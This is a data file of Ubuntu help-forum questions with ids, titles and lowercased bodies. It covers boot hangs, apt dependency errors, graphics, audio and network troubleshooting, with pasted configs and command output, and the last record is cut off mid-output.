432472	system does n't boot after installation	i have a fresh installation of 12.04.3 . after the installation and initial reboot , system , shows a large quantity of updates pending . as recommended , i downloaded all updates and installed them . at this point , system is asking again for a reboot . when i do this , my computer shuts down , restarts and hangs . i ca n't ctrl + alt + del i have to press the power-button to power off my system . when i start the system in recovery mode , i get a lot of messages , then the system hangs , seemingly somewhere during hardware probing , but not every time at the same point . sometimes during probing of my tv-capture card , sometimes somewhere else . what can i do to get a working system ?
432473	letting system updates know that i already have a newer kernel	i am running elementary os ( basically ubuntu 12.04 ) . i had to upgrade my kernel to 3.13 . i did this using dpkg . however , system updates still shows kernel 3.2 as available . is this because apt does not know that i already have a newer kernel ? how can i sync state between the two so that older kernel versions do not show up ?
432476	terminal closes immediately after open	i rebooted recently , and now terminal fails to work . if i click the terminal shortcut or use guake or ctrl-alt-t , the terminal opens briefly with no prompt , then immediately closes again . i installed xterm as well and the same thing happens . if i use ctrl-alt-f1 to get to a command line session and type gnome-terminal i get the error message : failed to parse arguments : can not open display how can i diagnose and fix this ? edit to add .bashrc path= $ path : $ home/.rvm/bin # add rvm to path for scripting [ [ -s `` $ home/.profile '' ] ] & & source `` $ home/.profile '' [ [ -s `` $ home/.rvm/scripts/rvm '' ] ] & & source `` $ home/.rvm/scripts/rvm '' # # # added by the heroku toolbelt export path= '' /usr/local/heroku/bin : $ path '' alias zf=/home/julio/zendframework-1.12.3/bin/zf.sh edit 2 -- adding .profile : # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi export scala_home=/usr/share/scala export path= $ path : $ scala_home/bin source ~/.profile
432477	i have a powermac4,2 ( 15 '' ) 800 mhz powerpc g4 ( 7450 ) nvidia geforce 2 mx with 32 mb of ddr sdram ( 15 '' )	i tried a few versions of linux and i have the same problem , gpu support ... can someone point me in the right direction please ... .will ubuntu work ?
432478	how to fix big previews on ubuntu	when i switch between windows using alt+tab , the previous being display appear very big a blurry . instead of having the original window preview , the image is very big a blurry . however when switching between windows of the same type such as two different chrome windows using alt+` i do n't get this problem . i 'm currently using ubuntu 13.10 64-bit . any help would be appreciated .
432488	ubuntu windows 8 bootloader not working	i have another to add to the list of ubuntu/windows 8 bootloader problems . i installed ubuntu , but the computer continually loaded windows 8 without giving me the grub menu option to choose between the two os 's at start up . searching for help the forum , i ran boot-repair as suggested . now , ubuntu loads properly , but the windows 8 option does not work at start up . it gives me a `` drivemap '' error and says `` invalid efi path '' . the recovery options for windows 8 still work , but i do n't need or want to access them . does anybody have any ideas that may help ? here is the link to the boot-repair report . http : //paste.ubuntu.com/7070756/ please be clear with any instructions , i 'm fairly novice in the terminal . thanks !
432496	adding a hibernate button to plasma	how can i add a hibernate button to the start menu ? : i remember there was a hibernate button in kde start menu .
432501	changing opacity of inactive windows in kde	is there a way to set a customization in plasma environment so that inactive windows will have opacity 30 % ? i know one can set specific titlebar colors for active and inactive windows . but i could not find anything about opacity .
432505	ubuntu running very slow . unity is being rendered by intel video card , not by my nvidia速 geforce速 gt 540m	i have installed ubuntu 12.04 . i have installed bumblebee too , and it works fine . but my operating system is very slow . i suppose it 's because the intel video card is rendering my graphic interface . when i want to use my dedicated video card , i use the optirun command ( e.g optirun firefox ) . how can i use optirun for graphic interface rendering ?
432506	when are network , broadcast and gateway required for configuring a network interface manually ?	https : //wiki.debian.org/networkconfiguration # bridging_without_switching the above url says , the following . but it is not clear to me when they are optional and when they are not . could you provide me with some link to references that describe this ? thanks . if you 're configuring it manually then something like this will set the default gateway ( network , broadcast and gateway are optional ) : auto eth0 iface eth0 inet static address 192.0.2.7 netmask 255.255.255.0 gateway 192.0.2.254
432508	why does ubuntu 's default ~/.profile source ~/.bashrc ?	these are the contents of the stock ~/.profile that came with my 13.10 ( commented lines removed ) : if [ -n `` $ bash_version '' ] ; then if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi this is inherited from debian but why did canonical decide to keep it ? as far as i know , it 's not the standard *nix way and i have seen various systems where this did not happen , so i assume they must have had a good reason to . this can cause unexpected behavior when running login shells ( such as when sshing into the machine for example ) where the user would not expect to have ~/.bashrc sourced . the only benefit i can think of is to not confuse the user with many startup files and allow them to edit .bashrc alone and have that read irrespective of shell type . that , however , is a dubious benefit since it is often useful to have different settings for login and for interactive shells and this blocks you from doing so . also , login shells are very often not run in a graphical environment and that can cause errors and warnings and problems ( oh my ! ) depending on what you 've set in those files . so why does ubuntu do this , what am i missing ?
432510	encrypted files on a server	there is a way of encrypting the data files stored on the server to harden them against direct access or hacking . the website is in /var/www as usual and uses php to access data on another drive mounted as /home/data if that is any help . i coded up the site myself and with my level of coding i doubt it it is uncrackable . i 'm also concerned that someone may gain physical access to the computer , and get access to the data that way .
432514	transpose album names for a bunch of mp3 files	i am looking for a script or tool that can move around elements of the album name of a big bunch of mp3 files . they currently have album names like : 1999 - the music of canada i would like the album names to be : canada ( 1999 ) music of there are around 200 albums that i need to rename .
432520	where is mono ide ?	i just installed ubuntu on my local mounted thumb drive . i went to software and installed mono . then i looked in the application folder and saw two icons for mono , one for a terminal which i did not install . i clicked on the other icon and selected open and nothing happened . i do i access the mono ide ?
432521	changing the sampling rate in ubuntu 12.04	i have used pocketsphinx for speech recognition in my project . pocketsphinx is recognizing words but as it works on a sample rate of 16000 hz and our laptop takes input at 22050 hz , output is not as efficient as we would like . so , please tell me the procedure of changing the sampling rate to 16000 hz in ubuntu 12.04 . i am stuck at this point and need help . any suggestions from your side regarding this issue are welcome . for changing the sampling rate , i have tried to modify pulse.conf , alsa.conf in ubuntu 12.04 . i have also tried to add .asoundrc file . but nothing has worked . so , i want to know the exact procedure of changing the sampling rate to 16000 hz in ubuntu 12.04 .
432522	how to convert multiple images to cbr ?	this might be a newbies question , i have a lot of image files with different extension ( *.jpg , *.png ) and i want to convert it to cbr file format . is there a way to achieve this or are there command to do this ? ( preferably using terminal )
432524	how do i find and set my $ editor environment variable ?	when i am using ipython or ipython3 , i can use the % edit command to open up an editor to write my python scripts in . my problem is that the default editor is vim and i really do not get how to use that editor . what i would like to do is to change the editor to either nano or gedit . i think to stay with the terminal i would prefer to change it to the nano editor . when i type in the 'edit ? ' command into the ipython terminal it says : % edit runs ipython 's editor hook . the default version of this hook is set to call the editor specified by your $ editor environment variable . if this is n't found , it will default to vi under linux/unix and to notepad under windows . see the end of this docstring for how to change the editor hook . then when i see the end of that docstring i see this : changing the default editor hook : if you wish to write your own editor hook , you can put it in a configuration file which you load at startup time . the default hook is defined in the ipython.core.hooks module , and you can use that as a starting example for further modifications . that file also has general instructions on how to set a new hook for use once you've defined it . sorry to be such a newbie , but i get lost here . i am not sure how to get to the ipython.core.hooks module , or just simply set an environment variable $ editor to nano . any suggestions ?
432525	when to use single or double quotes in ubuntu command-line ?	is there simple a rule to understand when to use quotes in ubuntu command line and when single quotes and when double quotes are needed ? for example , how to explain the difference here : $ echo $ 'a\naa\nac\nb\ncc\tdd\ne\se' a aa ac b cc dd e\se $ and $ echo $ '' a\naa\nac\nb\ncc\tdd\ne\se '' a\naa\nac\nb\ncc\tdd\ne\se $
432529	ubuntu 12.04 stuck at `` reboot : restarting system ''	i know this has been asked multiple times before , but most of these threads do n't have an answer . i tried user62664 's solution here and ran sudo update-grub successfully , but nothing changed . this happens whether i type sudo reboot or sudo shutdown -h now . here is what it looks like when it hangs . there are no error messages , everything shows up with ' [ ok ] ' , and then : * deconfiguring network interfaces ... [ ok ] * deactivating swap ... [ ok ] * unmounting local filesystems ... [ ok ] * will now restart [ 1306.738916 ] mei_me 0000:00:16.0 : stop [ 1306.739745 ] reboot : restarting system _ this seems like a very common problem , yet there are very few answers and they do n't seem to help in my case . does this mean there is no one solution ? in which case , where should i check to check to find out the root cause ?
432535	how to mount an old /home directory after os clean re-install ?	before re-installing ubuntu 12.04 lts , i unmounted the /home directory . after a clean re-install , i recreated some of the users and installed the ubuntu-desktop package , then re-mounted the old /home directory . all of the documents have been restored , and i have no problem as long as i login with the shell . however , when i try to login to the gui , it just re-loads the login screen . this has been happening ever since i included the old /home directory in /etc/fstab . trying to follow the solution here , i looked for the .xauthority files in every user 's /home directory and noticed something weird , the users seem to have been mixed up . for example , ls -lah | grep xauthority in /home/bob would show as : -rw -- -- -- - 1 emily emily 53 nov 29 10:19 .xauthority and so on . my guess is that i did n't re-create the users in the same order as in the old system , so that things went weird when i mounted the old /home directory . however ! i need to be able to plug the old /home directory files as is because they are several tb and i do n't have the space to transfer them here and there freely , nor am i allowed to delete anything . what should i do to fix this ? is it a good idea to replace all hidden files in each old /home/user directory by the new ones ? [ additional information ] contents of ls -l /home ( after mounting old /home ) ; note : lost+found was not supposed to be an user . total 36 drwxr-xr-x 22 bob bob 4096 mar 11 12:23 alice drwxr-xr-x 44 marc marc 4096 mar 11 12:21 emily drwxr-xr-x 23 1004 1004 4096 jul 29 2013 bob drwxr-xr-x 4 1005 1005 4096 jul 30 2013 ken drwx -- -- -- 2 root root 16384 mar 27 2012 lost+found drwxr-xr-r 40 emily emily 4096 mar 11 12:49 marc contents of cat /etc/passwd ( restricted to the users listed above ) : root : x:0:0 : root : /root : /bin/bash marc : x:1000:1000 : marc , , , :/home/marc : /bin/bash emily : x:1001:1001 : emily , , , :/home/emily : /bin/bash bob : x:1002:1002 : bob , , , :/home/bob : /bin/bash ken : x:1003:1003 : ken , , , :/home : ken : /bin/bash note : user alice was not re-created after os re-install because the account was no longer needed . output of lsblk : name maj : min rm size ro type mountpoint sda 8:0 0 931.5g 0 disk +sda1 8:1 0 285m 0 part +sda2 8:2 0 1k 0 part +sda5 8:5 0 18.6g 0 part +sda6 8:6 0 93.1g 0 part /home +sda7 8:7 0 93.1g 0 part +sda8 8:8 0 698.4g 0 part /home/marc/data +sda9 8:9 0 9.3g 0 part [ swap ] +sda10 8:10 0 18.6g 0 part / sr0 11:0 1 1024m 0 rom sdb 8:16 0 1.8t 0 disk +sdb1 8:17 0 1.8t 0 part /home/marc/data2 sdc 8:32 0 1.8t 0 disk +sdc1 8:33 0 200m 0 part +sdc2 8:34 0 465.8g 0 part /home/marc/usb_disk/disk1 +sdc3 8:35 0 465.8g 0 part /home/marc/usb_disk/disk2 +sdc4 8:36 0 465.8g 0 part /home/emily/data +sdc5 8:37 0 465.6g 0 part /var/www sdf 8:80 0 3.7t 0 disk +sdf1 8:81 0 1.8t 0 part /home/ken +sdf2 8:82 0 1.8t 0 part /home/bob sde 8:64 1 29.8g 0 disk +sde1 8:65 1 29.8g 0 part [ swap ] as you can see , user marc has documents shattered over a number of different disks and partitions .
432536	how to configure ffreeradius server in ubuntu server ?	i have an requirement to design internal radius server at my controller application . can you please let me know how to configure freeradius server in ubuntu ? thanks , suresh .
432537	ubuntu does n't recognize my mp3 player	i 'm attempting to put music on little brother 's trio mp3 player via usb connection and ubuntu seems to not be recognize it.would anyone be able to help me ? i ran dmesg and got back [ 451.057061 ] sd 6:0:0:0 : [ sdb ] 15240576 512-byte logical blocks : ( 7.80 gb/7.26 gib ) [ 451.057251 ] sd 6:0:0:0 : [ sdb ] write protect is off [ 451.057256 ] sd 6:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 451.057422 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 451.057426 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 451.059284 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 451.059299 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 451.079933 ] sdb : sdb1 [ 451.081325 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 451.081333 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 451.081339 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 459.739370 ] usb 3-4 : usb disconnect , device number 14 [ 459.751880 ] fat-fs ( sdb1 ) : unable to read boot sector to mark fs as dirty [ 712.492729 ] usb 3-3 : new high-speed usb device number 15 using xhci_hcd [ 712.509399 ] usb 3-3 : new usb device found , idvendor=18d1 , idproduct=0007 [ 712.509408 ] usb 3-3 : new usb device strings : mfr=2 , product=3 , serialnumber=4 [ 712.509411 ] usb 3-3 : product : android [ 712.509414 ] usb 3-3 : manufacturer : pc435 [ 712.509417 ] usb 3-3 : serialnumber : 20121009413fc082
432542	is ffmpeg missing from the official repositories in 14.04 ?	i tried to install ffmpeg in trusty/ubuntu 14.04 and got the following message : $ sudo apt-get install ffmpeg reading package lists ... done building dependency tree reading state information ... done package ffmpeg is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'ffmpeg ' has no installation candidate why is n't the package available ?
432545	loading directly to the commandline	for a completely unrelated problem , i ran update-grub following the instructions in user62644 's answer to this post . ever since , the gui has been loading by default upon boot , and i have to type ctrl+alt+f1 to access the bash shell . i would like the bash shell to load by default upon startup , and just type startx whenever i need the gui . i 'm running ubuntu 12.04 lts .
432546	can not set proper resolution	i have an amd raedon 6770 graphics card in my computer , and for some reason i 'm unable to get ubuntu 13.10 to read it . i had another copy of 13.10 on my desktop , but when i tried to install the .run file for the card from the terminal , it corrupted something within my operating system and i could no longer get ubuntu to boot . i 'm fairly new to this operating system , but am beginning to grasp the concept pretty fast . is there anyway to add a library of screen resolutions ? i really need something with a 16:9 ratio for my emerson tv screen which i 'm using as my monitor , and currently only 4:3 is available ( linked tv to computer through a monitor cable ) . i 've also tried to run a few xrandr commands without any success . any suggestions would be greatly appreciated !
432558	how can i make my brother hl 2240d work with ubuntu13.10 ?	i was trying to get my brother hl 2240d printer working with ubuntu 13.10 but its not printing . i did some search on the internet and followed the suggestions i found but at the end it always said some error occurred . is there any simple way i can make my printer work on ubuntu 13.10 ?
432561	motorola defy usb debug driver	i am trying to connect a motorola defy ( mb525 ) phone to my computer that is running ubuntu 13.10 . i ca n't connect my phone with my computer system successfully . what steps do i need to take for this to work ?
432562	how to install python-guestfs and libguestfs-tools in python virtual environment ?	can any one help me out to install python-guestfs and libguestfs-tools in python virtual environment ? i tried to install those packages with the help of pip install but it fails to install because it throws an error package not found .
432567	network manager showing nonsense after update ( march 2014 ) [ 12.04.4 lts ( 3.5.0-47-generic i686 ) ]	after my recent update , network manager is showing this : my question is : how to fix this ? how to remove additional ( cloned ) wireless device ? is there a config file for this ? the icon is showing `` no connection '' , but the connection is fine . it 's just confusing . is anyone else having the same problem ? any help appreciated ! edit : $ ifconfig eth0 link encap : ethernet hwaddr 10 : bf:48:99 : dd : ea up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2632 errors:0 dropped:0 overruns:0 frame:0 tx packets:2632 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:278871 ( 278.8 kb ) tx bytes:278871 ( 278.8 kb ) tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.10.60.6 p-t-p:10.10.60.5 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:446 errors:0 dropped:0 overruns:0 frame:0 tx packets:514 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:218908 ( 218.9 kb ) tx bytes:79418 ( 79.4 kb ) wlan0 link encap : ethernet hwaddr e0 : b9 : a5 : f1 : ba : a1 inet addr:192.168.2.6 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :e2b9 : a5ff : fef1 : baa1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:54292 errors:0 dropped:0 overruns:0 frame:0 tx packets:21951 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:23998073 ( 23.9 mb ) tx bytes:4705863 ( 4.7 mb ) $ cat /etc/network/interfaces auto lo iface lo inet loopback $ sudo lshw -c network *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : e0 : b9 : a5 : f1 : ba : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-47-generic firmware=n/a ip=192.168.2.6 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : dfe00000-dfe0ffff *-network description : ethernet interface product : ar8152 v2.0 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : c1 serial : 10 : bf:48:99 : dd : ea capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:47 memory : dfd00000-dfd3ffff ioport : e000 ( size=128 )
432570	installation of a .pak file ?	i 'm somewhat new to ubuntu so please be patient with me . ubuntu 13.10 using the newest gnome shell . i downloaded the new popcorn time app for linux . it came in a .zip file . after unzipping , it came with an .so .pak and .run file . i can double click the .run file to open the application , but i would like to fully install it into my system . is this possible ? thanks in advance .
432571	installation of zimbra on ubuntu server 12	i need some ideas . i have a one public ip and i installed zimbra in my server . the server has a private ip address but i want people outside my network to be able to access this server . i used this documentation to install bind 9 and then installed zimbra . after that i did port mapping in my router so as requests from outside would be redirected to my server ( since i have more than one server here but only one public ip ) . i have already registered a domain ( www.ushirika.or.tz ) in which i want when a person writes mail.ushirika.or.tz they would be redirected to the zimbra mail server . so far when i enter that address on my browser it says could not connect .
432575	ubuntu 13.10 32 bit or 64 ? lenovo thinkpad e531 - i3-3110m - 8gb ram	i wonder what version of ubuntu should i install : 32 or 64 bit ? my hardware : thinkpad e531 i3-3110m 8gb ram
432577	zoneminder on 13.10 can not click on add new monitor	i 've installed zoneminder on 13.10 , however , when i access the browser interface ( localhost/zm ) i can not click on `` add new monitor '' . it 's like this feature is disabled or something . when i click on `` add new monitor '' , nothing happens . absolutely useless .
432580	bashrc shortcuts in tmux	i have sets many shortcuts in .bashrc profile of local user , and they work properly . currently on my 12.04 system but when ever i tried to used them in tmux , i always get the same response command not found . is their any extra files which i have to edit for those shortcuts to work on tmux ?
432581	i installed eclipse via terminal and installed i want to know where sdk is located	i installed eclipse ( ultimate edition 3.5 ) in ubuntu 12.04 via the terminal . i also installed the adt plugin in the eclipse program via install new software . everything has completed but eclipse is asking for the location of sdk . where is sdk located on my computer ?
432583	bug in gforth.el preventing emacs24 from ppa from installing	i 'm having trouble installing emacs24 from the repository ppa : cassou/emacs because of an error in gforth.el . the problem is with a known-bug in gforth.el failing on a byte-compile . i 'm currently not able to install anything else with apt . there 's no bug on the related launchpad site either . i 'm guessing apt noticed i have gforth installed and tried to install the matching emacs mode for it , rather than this being a bug all installations run into . i have a version of gforth.el on a non-ubuntu machine that works ( just removed the byte compile call ) , but i 'm do n't know much about the inner-workings of apt to be able to replace the one provided with this new gforth.el . from the error message below , would anyone know how to have apt use this file instead of the one provided ? attempts so far i 've found gforth.el at /usr/share/emacs24/site-lisp/gforth/gforth.el and /usr/share/emacs/site-lisp/gforth/gforth.el . i 've replaced both with the working version of the file , but the error message remains the same . error message % sudo apt-get install emacs24 reading package lists ... done building dependency tree reading state information ... done emacs24 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up emacs24 ( 24.3+1-2~ppa1~saucy1 ) ... install dictionaries-common for emacs24 install/dictionaries-common : already byte-compiled for emacs24 . skipping ... install gforth for emacs24 install/gforth : byte-compiling for emacsen flavour emacs24 in toplevel form : gforth.el:734:18 : error : do n't know how to compile nil gforth.el:734:18 : error : do n't know how to compile nil gforth.el:734:18 : error : do n't know how to compile nil gforth.el:734:18 : error : do n't know how to compile nil gforth.el:734:18 : error : do n't know how to compile nil error : install script from gforth package failed dpkg : error processing emacs24 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : emacs24 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
432584	installing 12.04 without removing 11.04	i have ubuntu 11.04 installed on my computer alongside windows 7 . is it possible to also dual-boot 12.04 ? if not , will i need to overwrite the previous version of ubuntu ? . if so how can i do it ?
432586	how to solve mysql dependency problem	hi i ran the following command sudo apt-get upgrade however i 'm getting the following you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : mysql-server-5.5 : depends : mysql-server-core-5.5 ( = 5.5.28-0ubuntu0.12.04.3 ) but 5.5.35-0ubuntu0.12.04.2 is installed e : unmet dependencies . try using -f. i came across the following dependency problem with mysql-server-core-5.5 but not sure how i should go about applying it to my situation . any help would be appreciated
432591	error while installation	when i try to install or remove any application . i encounter the below error . how do i solve this issue ? reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : bleachbit : depends : menu but it is not going to be installed libreoffice-base-core : depends : libreoffice-core ( = 1:4.2.2~rc1-0ubuntu1~precise1 ) but 1:3.5.7-0ubuntu5 is to be installed depends : uno-libs3 ( > = 4.1.0~alpha ) but 3.5.7-0ubuntu5 is to be installed libreoffice-calc : depends : libreoffice-base-core ( = 1:3.5.7-0ubuntu5 ) but 1:4.2.2~rc1-0ubuntu1~precise1 is to be installed libreoffice-core : depends : libreoffice-common ( > 1:3.5.7 ) but it is not going to be installed libreoffice-writer : depends : libreoffice-base-core ( = 1:3.5.7-0ubuntu5 ) but 1:4.2.2~rc1-0ubuntu1~precise1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
432594	xemacs mode install	i 'm not expert in ubuntu , i have installed a software called avispa which has with it a folder called xemacs-mode which is said in the installation manual that it will add some boxes in the emacs , but after extracting it , i just added the environment variable and nothing have been added in the emacs . it also said that the avispa should recognize the files with extension like .if or .hlpsl so when running one of them it will be opened in xemacs with the features added . all of this is not showing on my ubuntu , how to solve it ?
432603	set headphones as default sound output ( defaults to hdmi )	ubuntu 13.10 on lenovo u410 . the screenshot explains it best after every reboot hdmi is selected as output device . i always have to switch to headphones ( which in fact are speakers and not headphones ) . they both work perfectly , but how do i make headphones the default ? . the ui does n't offer any options for that . hardware infos $ : sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf119m [ geforce 610m ] [ 10de:1058 ] ( rev ff ) 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) 04:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless network adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) $ : cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xeb610000 irq 46 $ : cat /proc/asound/card0/codec # 0 codec : conexant cx20590 address : 0 afg function id : 0x1 ( unsol 1 ) vendor id : 0x14f1506e subsystem id : 0x17aa400b revision id : 0x100003 no modem function group found default pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm default amp-in caps : n/a default amp-out caps : n/a state of afg node 0x01 : power states : d0 d1 d2 d3 d3cold clkstop epss power : setting=d0 , actual=d0 gpio : io=4 , o=0 , i=0 , unsolicited=1 , wake=0 io [ 0 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 1 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 2 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 io [ 3 ] : enable=0 , dir=0 , wake=0 , sticky=0 , data=0 , unsol=0 node 0x10 [ audio output ] wcaps 0xc1d : stereo amp-out r/l control : name= '' headphone playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' headphone playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 device : name= '' cx20590 analog '' , type= '' audio '' , device=0 amp-out caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-out vals : [ 0x4a 0x4a ] converter : stream=7 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x11 [ audio output ] wcaps 0xc1d : stereo amp-out r/l control : name= '' speaker playback volume '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 control : name= '' speaker playback switch '' , index=0 , device=0 controlamp : chs=3 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x4a , nsteps=0x4a , stepsize=0x03 , mute=1 amp-out vals : [ 0x80 0x80 ] converter : stream=7 , channel=0 pcm : rates [ 0x560 ] : 44100 48000 96000 192000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x12 [ audio output ] wcaps 0x611 : stereo digital converter : stream=0 , channel=0 digital : digital category : 0x0 iec coding type : 0x0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x5 ] : pcm ac3 power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 node 0x13 [ beep generator widget ] wcaps 0x70000c : mono amp-out control : name= '' beep playback volume '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 control : name= '' beep playback switch '' , index=0 , device=0 controlamp : chs=1 , dir=out , idx=0 , ofs=0 amp-out caps : ofs=0x07 , nsteps=0x07 , stepsize=0x0f , mute=0 amp-out vals : [ 0x07 ] node 0x14 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l control : name= '' internal mic capture volume '' , index=0 , device=0 controlamp : chs=1 , dir=in , idx=2 , ofs=0 control : name= '' inverted internal mic capture volume '' , index=0 , device=0 controlamp : chs=2 , dir=in , idx=2 , ofs=0 control : name= '' internal mic capture switch '' , index=0 , device=0 controlamp : chs=1 , dir=in , idx=2 , ofs=0 control : name= '' inverted internal mic capture switch '' , index=0 , device=0 controlamp : chs=2 , dir=in , idx=2 , ofs=0 control : name= '' mic capture volume '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 control : name= '' mic capture switch '' , index=0 , device=0 controlamp : chs=3 , dir=in , idx=0 , ofs=0 device : name= '' cx20590 analog '' , type= '' audio '' , device=0 amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] [ 0x80 0x80 ] converter : stream=4 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 96000 bits [ 0xe ] : 16 20 24 formats [ 0x1 ] : pcm power states : d0 d1 d2 d3 d3cold epss power : setting=d0 , actual=d0 connection : 4 0x17 0x18 0x23* 0x24 node 0x15 [ audio input ] wcaps 0x100d1b : stereo amp-in r/l amp-in caps : ofs=0x4a , nsteps=0x50 , stepsize=0x03 , mute=1 amp-in vals : [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] [ 0x4a 0x4a ] converter : stream=0 , channel=0 sdi-select : 0 pcm : rates [ 0x160 ] : 44100 48000 